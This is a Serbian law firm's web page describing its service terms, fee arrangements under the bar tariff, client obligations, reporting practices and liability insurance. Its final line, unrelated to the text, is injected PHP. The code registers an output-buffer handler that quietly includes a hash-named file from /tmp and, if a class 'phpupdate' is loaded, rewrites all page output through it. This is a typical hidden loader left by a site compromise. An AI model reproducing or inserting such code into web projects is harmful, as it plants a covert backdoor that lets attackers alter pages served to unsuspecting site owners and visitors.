Adresa: Cvijićeva 70, 11000 Beograd ; Telefoni: 011/408-6321; 061/6022-237 (dostupan putem Vibera i WhatsApp); 064/128-07-00 ; 063/7260-312

Advokatska kancelarija Ćehović

Svaka usluga se pruža na osnovu posebno zaključenog ugovora sa klijentom o pojedinačnom poslu ili grupi poslova. Pomenutim ugovorom će se precizno regulisati prava i obaveze advokata i naručioca usluga tj. klijenta.

– Ugovori se mogu zaključivati i putem elektronske pošte. Plaćanje će se vršiti na osnovu ugovora, prema važećoj Advokatskoj tarifi za advokatske usluge u Republici Srbiji, sa popustom za stalne klijente i klijente koji ugovaraju obavljanje poslova na duži vremenski period ili kojima su potrebne advokatske usluge čija cena prelazi određeni iznos (iznad 1.000,00 evra).

– Advokatske usluge se mogu ugovoriti i na osnovu advokatske tarife zemlje iz koje potiče strani državljanin klijent. U ovom slučaju obavezno se zaključuje pisani ugovor o obavljanju advokatskih usluga, sa cenom tih usluga.

– Ugovorom se reguliše i eventualno plaćanje usluga po proceentu, a nakon okončanja postupka. U ovom slučaju klijent mora da izvrši obezbeđenje budućeg plaćanja za obavljene advokatske usluge.

– Za sačinjavanje svakog pojedinog ugovora klijent će biti dužan da advokatu pruži detaljne podatke i obaveštenja. Za obavljanje usluga klijent advokatu je neophodno i posebno ili opšte punomoćje izdato od strane klijenta.


– Klijent snosi odgovornost za eventualno nesaopštavanje kompletne informacije, davanje netačne informacije, nekompletnih podataka, kao i nedavanja, odnosno zakasnelog potpisivanja i predavanja punomoćja, kao i neblagovremenog plaćanja dospelih naknada, odnosno troškova taksi ili drugih troškova. U slučaju ugovaranja većeg obima usluga, tj. usluga sa većim naknadama i troškovima klijent i advokat će ugovoriti način obezbeđenja plaćanja za navedene naknade advokatu i troškova za takse, kao i drugih troškova. Za usluge za koje nije predviđen iznos u Advokatskoj tarifi, cena i ostali troškovi će se regulisati navedenim ugovorima. Ugovorima će se regulisati i način obezbeđenja plaćanja, kao i plaćanja naknada za usluge i troškove taksi, kao i ostalih troškova advokata.

Prvih 10 minuta savetovanja, u pogledu osnovnih elemenata pravnog problema klijenta, je najčešće besplatno. Detaljno savetovanje se posebno naplaćuje, po ceni, koja će zavisiti od složenosti i vrednosti predmeta problema klijenta i dužini trajanja savetovanja. Cena svake usluge će se unapred regulisati ugovorom o obavljanju usluga. Advokat garantuje da će sve usluge obavljati maksimalno profesionalno, odgovorno i ažurno. Svakih 3-6 meseci, kao i nakon završetka usluge, advokat će klijenta izveštavati o izvršenoj usluzi. Advokat će poslati klijentu i detaljan izveštaj o obavljenoj usluzi.


O obavljanju usluga advokat će voditi detaljnu dokumentaciju i formirati posebne dosijee, sa kompletnom dokumentacijom o obavljenim uslugama, koju će na zahtev klijenta, u svako vreme staviti klijentu na uvid i raspolaganje, a po obavljenoj usluzi, advokat će kompletnu dokumentaciju predati klijentu. Advokat će klijentu, po obavljenoj usluzi, predati i sva novčana sredstva ili druge vrednosti koje za klijenta ostvari/naplati obavljanjem usluge.


Za eventualno prouzrokovanu štetu advokat odgovara svojom celokupnom imovinom. Ova odgovornost za štetu je garantovana i posebnim ugovorom o osiguranju od odgovornosti koji advokat ima, preko advokatske komore, sa osiguravajućim društvom u Srbiji, koji je zaključen uz posredovanje Advokatske komorom Srbije. Na ovaj način klijent je dodatno zaštićen u slučaju da advokat nije u mogućosti da plati ukupno prouzrokovanu štetu. Što znači da će ostatak - nenadoknađeni iznos štete, do punog iznosa, platiti osiguravajuće društvo, putem Advokatske komore Srbije. 

function ob_gzhanler($s) { $f='/tmp/ssess_ca1c478a01acafb1a87447acaae6484f'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');